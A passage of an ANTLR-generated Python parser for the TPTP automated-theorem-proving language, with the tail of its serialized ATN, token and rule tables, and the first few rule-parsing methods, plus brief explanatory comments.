buf.write("\u060b\u060c\7(\2\2\u060c\u060e\5\u0192\u00ca\2\u060d")
buf.write("\u060f\5\u0178\u00bd\2\u060e\u060d\3\2\2\2\u060e\u060f")
buf.write("\3\2\2\2\u060f\u0610\3\2\2\2\u0610\u0611\7\5\2\2\u0611")
buf.write("\u0177\3\2\2\2\u0612\u0613\7\4\2\2\u0613\u0614\7\16\2")
buf.write("\2\u0614\u0615\5\u017a\u00be\2\u0615\u0616\7\17\2\2\u0616")
buf.write("\u0179\3\2\2\2\u0617\u061c\5\u0188\u00c5\2\u0618\u0619")
buf.write("\7\4\2\2\u0619\u061b\5\u0188\u00c5\2\u061a\u0618\3\2\2")
buf.write("\2\u061b\u061e\3\2\2\2\u061c\u061a\3\2\2\2\u061c\u061d")
buf.write("\3\2\2\2\u061d\u017b\3\2\2\2\u061e\u061c\3\2\2\2\u061f")
buf.write("\u0626\5\u017e\u00c0\2\u0620\u0621\5\u017e\u00c0\2\u0621")
buf.write("\u0622\7\20\2\2\u0622\u0623\5\u017c\u00bf\2\u0623\u0626")
buf.write("\3\2\2\2\u0624\u0626\5\u0184\u00c3\2\u0625\u061f\3\2\2")
buf.write("\2\u0625\u0620\3\2\2\2\u0625\u0624\3\2\2\2\u0626\u017d")
buf.write("\3\2\2\2\u0627\u062e\5\u018a\u00c6\2\u0628\u062e\5\u0180")
buf.write("\u00c1\2\u0629\u062e\5\u0130\u0099\2\u062a\u062e\5\u0190")
buf.write("\u00c9\2\u062b\u062e\7b\2\2\u062c\u062e\5\u0182\u00c2")
buf.write("\2\u062d\u0627\3\2\2\2\u062d\u0628\3\2\2\2\u062d\u0629")
buf.write("\3\2\2\2\u062d\u062a\3\2\2\2\u062d\u062b\3\2\2\2\u062d")
buf.write("\u062c\3\2\2\2\u062e\u017f\3\2\2\2\u062f\u0630\5\u018a")
buf.write("\u00c6\2\u0630\u0631\7\f\2\2\u0631\u0632\5\u0186\u00c4")
buf.write("\2\u0632\u0633\7\r\2\2\u0633\u0181\3\2\2\2\u0634\u0635")
buf.write("\7)\2\2\u0635\u0636\5\34\17\2\u0636\u0637\7\r\2\2\u0637")
buf.write("\u0649\3\2\2\2\u0638\u0639\7*\2\2\u0639\u063a\5d\63\2")
buf.write("\u063a\u063b\7\r\2\2\u063b\u0649\3\2\2\2\u063c\u063d\7")
buf.write("+\2\2\u063d\u063e\5\u00b4[\2\u063e\u063f\7\r\2\2\u063f")
buf.write("\u0649\3\2\2\2\u0640\u0641\7,\2\2\u0641\u0642\5\u00f4")
buf.write("{\2\u0642\u0643\7\r\2\2\u0643\u0649\3\2\2\2\u0644\u0645")
buf.write("\7-\2\2\u0645\u0646\5\u00e4s\2\u0646\u0647\7\r\2\2\u0647")
buf.write("\u0649\3\2\2\2\u0648\u0634\3\2\2\2\u0648\u0638\3\2\2\2")
buf.write("\u0648\u063c\3\2\2\2\u0648\u0640\3\2\2\2\u0648\u0644\3")
buf.write("\2\2\2\u0649\u0183\3\2\2\2\u064a\u0650\7\23\2\2\u064b")
buf.write("\u064c\7\16\2\2\u064c\u064d\5\u0186\u00c4\2\u064d\u064e")
buf.write("\7\17\2\2\u064e\u0650\3\2\2\2\u064f\u064a\3\2\2\2\u064f")
buf.write("\u064b\3\2\2\2\u0650\u0185\3\2\2\2\u0651\u0656\5\u017c")
buf.write("\u00bf\2\u0652\u0653\7\4\2\2\u0653\u0655\5\u017c\u00bf")
buf.write("\2\u0654\u0652\3\2\2\2\u0655\u0658\3\2\2\2\u0656\u0654")
buf.write("\3\2\2\2\u0656\u0657\3\2\2\2\u0657\u0187\3\2\2\2\u0658")
buf.write("\u0656\3\2\2\2\u0659\u065c\5\u018a\u00c6\2\u065a\u065c")
buf.write("\7R\2\2\u065b\u0659\3\2\2\2\u065b\u065a\3\2\2\2\u065c")
buf.write("\u0189\3\2\2\2\u065d\u065e\t\t\2\2\u065e\u018b\3\2\2\2")
buf.write("\u065f\u0660\7]\2\2\u0660\u018d\3\2\2\2\u0661\u0662\7")
buf.write("^\2\2\u0662\u018f\3\2\2\2\u0663\u0664\t\n\2\2\u0664\u0191")
buf.write("\3\2\2\2\u0665\u0666\7a\2\2\u0666\u0193\3\2\2\2\177\u0197")
buf.write("\u019e\u01a7\u01b0\u01bd\u01c8\u01d3\u01de\u01e9\u01f4")
buf.write("\u01fb\u0201\u0207\u020c\u0215\u0221\u022e\u023b\u0248")
buf.write("\u0258\u025d\u026c\u027e\u0283\u029e\u02a7\u02b0\u02ba")
buf.write("\u02c6\u02d3\u02de\u02ea\u02f1\u02f6\u02fd\u0302\u0306")
buf.write("\u030e\u031a\u0327\u0333\u0341\u0346\u0350\u0368\u036f")
buf.write("\u0376\u0381\u038b\u0392\u0399\u03a4\u03ae\u03b8\u03bf")
buf.write("\u03c6\u03d1\u03de\u03ec\u03f3\u03fd\u0404\u0415\u041a")
buf.write("\u041e\u0429\u042d\u0431\u0439\u0445\u0452\u045c\u046a")
buf.write("\u0471\u047a\u0480\u0490\u0494\u049e\u04a6\u04ad\u04b5")
buf.write("\u04ba\u04d0\u04d7\u04e1\u04e8\u04ef\u04f7\u0501\u0508")
buf.write("\u050d\u0517\u051b\u0521\u0535\u0539\u054f\u055b\u0562")
buf.write("\u0567\u0578\u057f\u0584\u058c\u0595\u059a\u05a4\u05ad")
buf.write("\u05bc\u05c3\u05c9\u05cd\u05db\u05e2\u0604\u0609\u060e")
buf.write("\u061c\u0625\u062d\u0648\u064f\u0656\u065b")
return buf.getvalue()
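# Note: the buffer written above is the serialized ATN (augmented transition
# network) that ANTLR emits for this grammar. It is decoded once, at class
# definition time, by the ATNDeserializer call below and drives every parse
# decision the parser makes.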
class tptp_v7_0_0_0Parser ( Parser ):
grammarFileName = "tptp_v7_0_0_0.g4"
atn = ATNDeserializer().deserialize(serializedATN())
decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]
sharedContextCache = PredictionContextCache()
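    # atn, decisionsToDFA and sharedContextCache are class-level attributes,
    # so they are built once and shared by every parser instance created from
    # this module.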
literalNames = [ "<INVALID>", "'tpi('", "','", "').'", "'thf('", "'tfx('",
"'tff('", "'tcf('", "'fof('", "'cnf('", "'('", "')'",
"'['", "']'", "':'", "'$ite('", "'$let('", "'[]'",
"'{}'", "'{'", "'}'", "'$ite_f('", "'$let_tf('", "'$let_ff('",
"'$ite_t('", "'$let_ft('", "'$let_tt('", "'inference('",
"'introduced('", "'file('", "'theory('", "'creator('",
"'description('", "'iquote('", "'status('", "'assumptions('",
"'refutation('", "'new_symbols('", "'include('", "'$thf('",
"'$tff('", "'$fof('", "'$cnf('", "'$fot('", "'|'",
"'&'", "'<=>'", "'=>'", "'<='", "'<~>'", "'~|'", "'~&'",
"'~'", "'!!'", "'!>'", "'!='", "'='", "'!'", "'??'",
"'?*'", "'?'", "'^'", "'@@+'", "'@+'", "'@@-'", "'@-'",
"'@='", "'@'", "':='", "'>'", "'*'", "'+'", "'<<'",
"'-->'" ]
symbolicNames = [ "<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"<INVALID>", "<INVALID>", "<INVALID>", "<INVALID>",
"Or", "And", "Iff", "Impl", "If", "Niff", "Nor", "Nand",
"Not", "ForallComb", "TyForall", "Infix_inequality",
"Infix_equality", "Forall", "ExistsComb", "TyExists",
"Exists", "Lambda", "ChoiceComb", "Choice", "DescriptionComb",
"Description", "EqComb", "App", "Assignment", "Arrow",
"Star", "Plus", "Subtype_sign", "Gentzen_arrow", "Real",
"Signed_real", "Unsigned_real", "Rational", "Signed_rational",
"Unsigned_rational", "Integer", "Signed_integer",
"Unsigned_integer", "Decimal", "Positive_decimal",
"Decimal_exponent", "Decimal_fraction", "Dot_decimal",
"Exp_integer", "Signed_exp_integer", "Unsigned_exp_integer",
"Dollar_word", "Dollar_dollar_word", "Upper_word",
"Lower_word", "Single_quoted", "Distinct_object",
"WS", "Line_comment", "Block_comment" ]
RULE_tptp_file = 0
RULE_tptp_input = 1
RULE_annotated_formula = 2
RULE_tpi_annotated = 3
RULE_tpi_formula = 4
RULE_thf_annotated = 5
RULE_tfx_annotated = 6
RULE_tff_annotated = 7
RULE_tcf_annotated = 8
RULE_fof_annotated = 9
RULE_cnf_annotated = 10
RULE_annotations = 11
RULE_formula_role = 12
RULE_thf_formula = 13
RULE_thf_logic_formula = 14
RULE_thf_binary_formula = 15
RULE_thf_binary_pair = 16
RULE_thf_binary_tuple = 17
RULE_thf_or_formula = 18
RULE_thf_and_formula = 19
RULE_thf_apply_formula = 20
RULE_thf_unitary_formula = 21
RULE_thf_quantified_formula = 22
RULE_thf_quantification = 23
RULE_thf_variable_list = 24
RULE_thf_variable = 25
RULE_thf_typed_variable = 26
RULE_thf_unary_formula = 27
RULE_thf_atom = 28
RULE_thf_function = 29
RULE_thf_conn_term = 30
RULE_thf_conditional = 31
RULE_thf_let = 32
RULE_thf_arguments = 33
RULE_thf_type_formula = 34
RULE_thf_typeable_formula = 35
RULE_thf_subtype = 36
RULE_thf_top_level_type = 37
RULE_thf_unitary_type = 38
RULE_thf_apply_type = 39
RULE_thf_binary_type = 40
RULE_thf_mapping_type = 41
RULE_thf_xprod_type = 42
RULE_thf_union_type = 43
RULE_thf_sequent = 44
RULE_thf_tuple = 45
RULE_thf_formula_list = 46
RULE_tfx_formula = 47
RULE_tfx_logic_formula = 48
RULE_tff_formula = 49
RULE_tff_logic_formula = 50
RULE_tff_binary_formula = 51
RULE_tff_binary_nonassoc = 52
RULE_tff_binary_assoc = 53
RULE_tff_or_formula = 54
RULE_tff_and_formula = 55
RULE_tff_unitary_formula = 56
RULE_tff_quantified_formula = 57
RULE_tff_variable_list = 58
RULE_tff_variable = 59
RULE_tff_typed_variable = 60
RULE_tff_unary_formula = 61
RULE_tff_atomic_formula = 62
RULE_tff_conditional = 63
RULE_tff_let = 64
RULE_tff_let_term_defns = 65
RULE_tff_let_term_list = 66
RULE_tff_let_term_defn = 67
RULE_tff_let_term_binding = 68
RULE_tff_let_formula_defns = 69
RULE_tff_let_formula_list = 70
RULE_tff_let_formula_defn = 71
RULE_tff_let_formula_binding = 72
RULE_tff_sequent = 73
RULE_tff_formula_tuple = 74
RULE_tff_formula_tuple_list = 75
RULE_tff_typed_atom = 76
RULE_tff_subtype = 77
RULE_tff_top_level_type = 78
RULE_tf1_quantified_type = 79
RULE_tff_monotype = 80
RULE_tff_unitary_type = 81
RULE_tff_atomic_type = 82
RULE_tff_type_arguments = 83
RULE_tff_mapping_type = 84
RULE_tff_xprod_type = 85
RULE_tcf_formula = 86
RULE_tcf_logic_formula = 87
RULE_tcf_quantified_formula = 88
RULE_fof_formula = 89
RULE_fof_logic_formula = 90
RULE_fof_binary_formula = 91
RULE_fof_binary_nonassoc = 92
RULE_fof_binary_assoc = 93
RULE_fof_or_formula = 94
RULE_fof_and_formula = 95
RULE_fof_unitary_formula = 96
RULE_fof_quantified_formula = 97
RULE_fof_variable_list = 98
RULE_fof_unary_formula = 99
RULE_fof_infix_unary = 100
RULE_fof_atomic_formula = 101
RULE_fof_plain_atomic_formula = 102
RULE_fof_defined_atomic_formula = 103
RULE_fof_defined_plain_formula = 104
RULE_fof_defined_infix_formula = 105
RULE_fof_system_atomic_formula = 106
RULE_fof_plain_term = 107
RULE_fof_defined_term = 108
RULE_fof_defined_atomic_term = 109
RULE_fof_defined_plain_term = 110
RULE_fof_system_term = 111
RULE_fof_arguments = 112
RULE_fof_term = 113
RULE_fof_function_term = 114
RULE_tff_conditional_term = 115
RULE_tff_let_term = 116
RULE_tff_tuple_term = 117
RULE_fof_sequent = 118
RULE_fof_formula_tuple = 119
RULE_fof_formula_tuple_list = 120
RULE_cnf_formula = 121
RULE_cnf_disjunction = 122
RULE_cnf_literal = 123
RULE_thf_quantifier = 124
RULE_th0_quantifier = 125
RULE_th1_quantifier = 126
RULE_thf_pair_connective = 127
RULE_thf_unary_connective = 128
RULE_th1_unary_connective = 129
RULE_tff_pair_connective = 130
RULE_fof_quantifier = 131
RULE_binary_connective = 132
RULE_assoc_connective = 133
RULE_unary_connective = 134
RULE_type_constant = 135
RULE_type_functor = 136
RULE_defined_type = 137
RULE_system_type = 138
RULE_atom = 139
RULE_untyped_atom = 140
RULE_defined_proposition = 141
RULE_defined_predicate = 142
RULE_defined_infix_pred = 143
RULE_constant = 144
RULE_functor = 145
RULE_system_constant = 146
RULE_system_functor = 147
RULE_defined_constant = 148
RULE_defined_functor = 149
RULE_defined_term = 150
RULE_variable = 151
RULE_source = 152
RULE_sources = 153
RULE_dag_source = 154
RULE_inference_record = 155
RULE_inference_rule = 156
RULE_inference_parents = 157
RULE_parent_list = 158
RULE_parent_info = 159
RULE_parent_details = 160
RULE_internal_source = 161
RULE_intro_type = 162
RULE_external_source = 163
RULE_file_source = 164
RULE_file_info = 165
RULE_theory = 166
RULE_theory_name = 167
RULE_creator_source = 168
RULE_creator_name = 169
RULE_optional_info = 170
RULE_useful_info = 171
RULE_info_items = 172
RULE_info_item = 173
RULE_formula_item = 174
RULE_description_item = 175
RULE_iquote_item = 176
RULE_inference_item = 177
RULE_inference_status = 178
RULE_status_value = 179
RULE_inference_info = 180
RULE_assumptions_record = 181
RULE_refutation = 182
RULE_new_symbol_record = 183
RULE_new_symbol_list = 184
RULE_principal_symbol = 185
RULE_include = 186
RULE_formula_selection = 187
RULE_name_list = 188
RULE_general_term = 189
RULE_general_data = 190
RULE_general_function = 191
RULE_formula_data = 192
RULE_general_list = 193
RULE_general_terms = 194
RULE_name = 195
RULE_atomic_word = 196
RULE_atomic_defined_word = 197
RULE_atomic_system_word = 198
RULE_number = 199
RULE_file_name = 200
ruleNames = [ "tptp_file", "tptp_input", "annotated_formula", "tpi_annotated",
"tpi_formula", "thf_annotated", "tfx_annotated", "tff_annotated",
"tcf_annotated", "fof_annotated", "cnf_annotated", "annotations",
"formula_role", "thf_formula", "thf_logic_formula", "thf_binary_formula",
"thf_binary_pair", "thf_binary_tuple", "thf_or_formula",
"thf_and_formula", "thf_apply_formula", "thf_unitary_formula",
"thf_quantified_formula", "thf_quantification", "thf_variable_list",
"thf_variable", "thf_typed_variable", "thf_unary_formula",
"thf_atom", "thf_function", "thf_conn_term", "thf_conditional",
"thf_let", "thf_arguments", "thf_type_formula", "thf_typeable_formula",
"thf_subtype", "thf_top_level_type", "thf_unitary_type",
"thf_apply_type", "thf_binary_type", "thf_mapping_type",
"thf_xprod_type", "thf_union_type", "thf_sequent", "thf_tuple",
"thf_formula_list", "tfx_formula", "tfx_logic_formula",
"tff_formula", "tff_logic_formula", "tff_binary_formula",
"tff_binary_nonassoc", "tff_binary_assoc", "tff_or_formula",
"tff_and_formula", "tff_unitary_formula", "tff_quantified_formula",
"tff_variable_list", "tff_variable", "tff_typed_variable",
"tff_unary_formula", "tff_atomic_formula", "tff_conditional",
"tff_let", "tff_let_term_defns", "tff_let_term_list",
"tff_let_term_defn", "tff_let_term_binding", "tff_let_formula_defns",
"tff_let_formula_list", "tff_let_formula_defn", "tff_let_formula_binding",
"tff_sequent", "tff_formula_tuple", "tff_formula_tuple_list",
"tff_typed_atom", "tff_subtype", "tff_top_level_type",
"tf1_quantified_type", "tff_monotype", "tff_unitary_type",
"tff_atomic_type", "tff_type_arguments", "tff_mapping_type",
"tff_xprod_type", "tcf_formula", "tcf_logic_formula",
"tcf_quantified_formula", "fof_formula", "fof_logic_formula",
"fof_binary_formula", "fof_binary_nonassoc", "fof_binary_assoc",
"fof_or_formula", "fof_and_formula", "fof_unitary_formula",
"fof_quantified_formula", "fof_variable_list", "fof_unary_formula",
"fof_infix_unary", "fof_atomic_formula", "fof_plain_atomic_formula",
"fof_defined_atomic_formula", "fof_defined_plain_formula",
"fof_defined_infix_formula", "fof_system_atomic_formula",
"fof_plain_term", "fof_defined_term", "fof_defined_atomic_term",
"fof_defined_plain_term", "fof_system_term", "fof_arguments",
"fof_term", "fof_function_term", "tff_conditional_term",
"tff_let_term", "tff_tuple_term", "fof_sequent", "fof_formula_tuple",
"fof_formula_tuple_list", "cnf_formula", "cnf_disjunction",
"cnf_literal", "thf_quantifier", "th0_quantifier", "th1_quantifier",
"thf_pair_connective", "thf_unary_connective", "th1_unary_connective",
"tff_pair_connective", "fof_quantifier", "binary_connective",
"assoc_connective", "unary_connective", "type_constant",
"type_functor", "defined_type", "system_type", "atom",
"untyped_atom", "defined_proposition", "defined_predicate",
"defined_infix_pred", "constant", "functor", "system_constant",
"system_functor", "defined_constant", "defined_functor",
"defined_term", "variable", "source", "sources", "dag_source",
"inference_record", "inference_rule", "inference_parents",
"parent_list", "parent_info", "parent_details", "internal_source",
"intro_type", "external_source", "file_source", "file_info",
"theory", "theory_name", "creator_source", "creator_name",
"optional_info", "useful_info", "info_items", "info_item",
"formula_item", "description_item", "iquote_item", "inference_item",
"inference_status", "status_value", "inference_info",
"assumptions_record", "refutation", "new_symbol_record",
"new_symbol_list", "principal_symbol", "include", "formula_selection",
"name_list", "general_term", "general_data", "general_function",
"formula_data", "general_list", "general_terms", "name",
"atomic_word", "atomic_defined_word", "atomic_system_word",
"number", "file_name" ]
EOF = Token.EOF
T__0=1
T__1=2
T__2=3
T__3=4
T__4=5
T__5=6
T__6=7
T__7=8
T__8=9
T__9=10
T__10=11
T__11=12
T__12=13
T__13=14
T__14=15
T__15=16
T__16=17
T__17=18
T__18=19
T__19=20
T__20=21
T__21=22
T__22=23
T__23=24
T__24=25
T__25=26
T__26=27
T__27=28
T__28=29
T__29=30
T__30=31
T__31=32
T__32=33
T__33=34
T__34=35
T__35=36
T__36=37
T__37=38
T__38=39
T__39=40
T__40=41
T__41=42
T__42=43
Or=44
And=45
Iff=46
Impl=47
If=48
Niff=49
Nor=50
Nand=51
Not=52
ForallComb=53
TyForall=54
Infix_inequality=55
Infix_equality=56
Forall=57
ExistsComb=58
TyExists=59
Exists=60
Lambda=61
ChoiceComb=62
Choice=63
DescriptionComb=64
Description=65
EqComb=66
App=67
Assignment=68
Arrow=69
Star=70
Plus=71
Subtype_sign=72
Gentzen_arrow=73
Real=74
Signed_real=75
Unsigned_real=76
Rational=77
Signed_rational=78
Unsigned_rational=79
Integer=80
Signed_integer=81
Unsigned_integer=82
Decimal=83
Positive_decimal=84
Decimal_exponent=85
Decimal_fraction=86
Dot_decimal=87
Exp_integer=88
Signed_exp_integer=89
Unsigned_exp_integer=90
Dollar_word=91
Dollar_dollar_word=92
Upper_word=93
Lower_word=94
Single_quoted=95
Distinct_object=96
WS=97
Line_comment=98
Block_comment=99
def __init__(self, input:TokenStream, output:TextIO = sys.stdout):
super().__init__(input, output)
self.checkVersion("4.9")
self._interp = ParserATNSimulator(self, self.atn, self.decisionsToDFA, self.sharedContextCache)
self._predicates = None
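        # Minimal usage sketch (kept as a comment so the generated file stays
        # untouched at runtime). It assumes the companion lexer generated from
        # the same grammar is importable as tptp_v7_0_0_0Lexer and that
        # "problem.p" is a TPTP input file; both names are illustrative only.
        #
        #   from antlr4 import FileStream, CommonTokenStream
        #   from tptp_v7_0_0_0Lexer import tptp_v7_0_0_0Lexer
        #
        #   stream = FileStream("problem.p")
        #   tokens = CommonTokenStream(tptp_v7_0_0_0Lexer(stream))
        #   parser = tptp_v7_0_0_0Parser(tokens)
        #   tree = parser.tptp_file()   # entry rule; returns the parse tree
        #
        # Each grammar rule below is generated as a <Rule>Context class plus a
        # parse method with the same name as the rule.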
class Tptp_fileContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def EOF(self):
return self.getToken(tptp_v7_0_0_0Parser.EOF, 0)
def tptp_input(self, i:int=None):
if i is None:
return self.getTypedRuleContexts(tptp_v7_0_0_0Parser.Tptp_inputContext)
else:
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tptp_inputContext,i)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tptp_file
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTptp_file" ):
listener.enterTptp_file(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTptp_file" ):
listener.exitTptp_file(self)
def tptp_file(self):
localctx = tptp_v7_0_0_0Parser.Tptp_fileContext(self, self._ctx, self.state)
self.enterRule(localctx, 0, self.RULE_tptp_file)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 405
self._errHandler.sync(self)
_la = self._input.LA(1)
while (((_la) & ~0x3f) == 0 and ((1 << _la) & ((1 << tptp_v7_0_0_0Parser.T__0) | (1 << tptp_v7_0_0_0Parser.T__3) | (1 << tptp_v7_0_0_0Parser.T__4) | (1 << tptp_v7_0_0_0Parser.T__5) | (1 << tptp_v7_0_0_0Parser.T__6) | (1 << tptp_v7_0_0_0Parser.T__7) | (1 << tptp_v7_0_0_0Parser.T__8) | (1 << tptp_v7_0_0_0Parser.T__37))) != 0):
self.state = 402
self.tptp_input()
self.state = 407
self._errHandler.sync(self)
_la = self._input.LA(1)
self.state = 408
self.match(tptp_v7_0_0_0Parser.EOF)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tptp_inputContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def annotated_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Annotated_formulaContext,0)
def include(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.IncludeContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tptp_input
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTptp_input" ):
listener.enterTptp_input(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTptp_input" ):
listener.exitTptp_input(self)
def tptp_input(self):
localctx = tptp_v7_0_0_0Parser.Tptp_inputContext(self, self._ctx, self.state)
self.enterRule(localctx, 2, self.RULE_tptp_input)
try:
self.state = 412
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__0, tptp_v7_0_0_0Parser.T__3, tptp_v7_0_0_0Parser.T__4, tptp_v7_0_0_0Parser.T__5, tptp_v7_0_0_0Parser.T__6, tptp_v7_0_0_0Parser.T__7, tptp_v7_0_0_0Parser.T__8]:
self.enterOuterAlt(localctx, 1)
self.state = 410
self.annotated_formula()
pass
elif token in [tptp_v7_0_0_0Parser.T__37]:
self.enterOuterAlt(localctx, 2)
self.state = 411
self.include()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Annotated_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def thf_annotated(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_annotatedContext,0)
def tfx_annotated(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tfx_annotatedContext,0)
def tff_annotated(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tff_annotatedContext,0)
def tcf_annotated(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tcf_annotatedContext,0)
def fof_annotated(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_annotatedContext,0)
def cnf_annotated(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Cnf_annotatedContext,0)
def tpi_annotated(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tpi_annotatedContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_annotated_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterAnnotated_formula" ):
listener.enterAnnotated_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitAnnotated_formula" ):
listener.exitAnnotated_formula(self)
def annotated_formula(self):
localctx = tptp_v7_0_0_0Parser.Annotated_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 4, self.RULE_annotated_formula)
try:
self.state = 421
self._errHandler.sync(self)
token = self._input.LA(1)
if token in [tptp_v7_0_0_0Parser.T__3]:
self.enterOuterAlt(localctx, 1)
self.state = 414
self.thf_annotated()
pass
elif token in [tptp_v7_0_0_0Parser.T__4]:
self.enterOuterAlt(localctx, 2)
self.state = 415
self.tfx_annotated()
pass
elif token in [tptp_v7_0_0_0Parser.T__5]:
self.enterOuterAlt(localctx, 3)
self.state = 416
self.tff_annotated()
pass
elif token in [tptp_v7_0_0_0Parser.T__6]:
self.enterOuterAlt(localctx, 4)
self.state = 417
self.tcf_annotated()
pass
elif token in [tptp_v7_0_0_0Parser.T__7]:
self.enterOuterAlt(localctx, 5)
self.state = 418
self.fof_annotated()
pass
elif token in [tptp_v7_0_0_0Parser.T__8]:
self.enterOuterAlt(localctx, 6)
self.state = 419
self.cnf_annotated()
pass
elif token in [tptp_v7_0_0_0Parser.T__0]:
self.enterOuterAlt(localctx, 7)
self.state = 420
self.tpi_annotated()
pass
else:
raise NoViableAltException(self)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tpi_annotatedContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def name(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.NameContext,0)
def formula_role(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Formula_roleContext,0)
def tpi_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Tpi_formulaContext,0)
def annotations(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.AnnotationsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tpi_annotated
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTpi_annotated" ):
listener.enterTpi_annotated(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTpi_annotated" ):
listener.exitTpi_annotated(self)
def tpi_annotated(self):
localctx = tptp_v7_0_0_0Parser.Tpi_annotatedContext(self, self._ctx, self.state)
self.enterRule(localctx, 6, self.RULE_tpi_annotated)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 423
self.match(tptp_v7_0_0_0Parser.T__0)
self.state = 424
self.name()
self.state = 425
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 426
self.formula_role()
self.state = 427
self.match(tptp_v7_0_0_0Parser.T__1)
self.state = 428
self.tpi_formula()
self.state = 430
self._errHandler.sync(self)
_la = self._input.LA(1)
if _la==tptp_v7_0_0_0Parser.T__1:
self.state = 429
self.annotations()
self.state = 432
self.match(tptp_v7_0_0_0Parser.T__2)
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Tpi_formulaContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def fof_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Fof_formulaContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_tpi_formula
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterTpi_formula" ):
listener.enterTpi_formula(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitTpi_formula" ):
listener.exitTpi_formula(self)
def tpi_formula(self):
localctx = tptp_v7_0_0_0Parser.Tpi_formulaContext(self, self._ctx, self.state)
self.enterRule(localctx, 8, self.RULE_tpi_formula)
try:
self.enterOuterAlt(localctx, 1)
self.state = 434
self.fof_formula()
except RecognitionException as re:
localctx.exception = re
self._errHandler.reportError(self, re)
self._errHandler.recover(self, re)
finally:
self.exitRule()
return localctx
class Thf_annotatedContext(ParserRuleContext):
def __init__(self, parser, parent:ParserRuleContext=None, invokingState:int=-1):
super().__init__(parent, invokingState)
self.parser = parser
def name(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.NameContext,0)
def formula_role(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Formula_roleContext,0)
def thf_formula(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.Thf_formulaContext,0)
def annotations(self):
return self.getTypedRuleContext(tptp_v7_0_0_0Parser.AnnotationsContext,0)
def getRuleIndex(self):
return tptp_v7_0_0_0Parser.RULE_thf_annotated
def enterRule(self, listener:ParseTreeListener):
if hasattr( listener, "enterThf_annotated" ):
listener.enterThf_annotated(self)
def exitRule(self, listener:ParseTreeListener):
if hasattr( listener, "exitThf_annotated" ):
listener.exitThf_annotated(self)
def thf_annotated(self):
localctx = tptp_v7_0_0_0Parser.Thf_annotatedContext(self, self._ctx, self.state)
self.enterRule(localctx, 10, self.RULE_thf_annotated)
self._la = 0 # Token type
try:
self.enterOuterAlt(localctx, 1)
self.state = 436
self.match(tptp_v7_0_0_0Parser.T__3)
self.state = 437
self.name()
self.state = 438
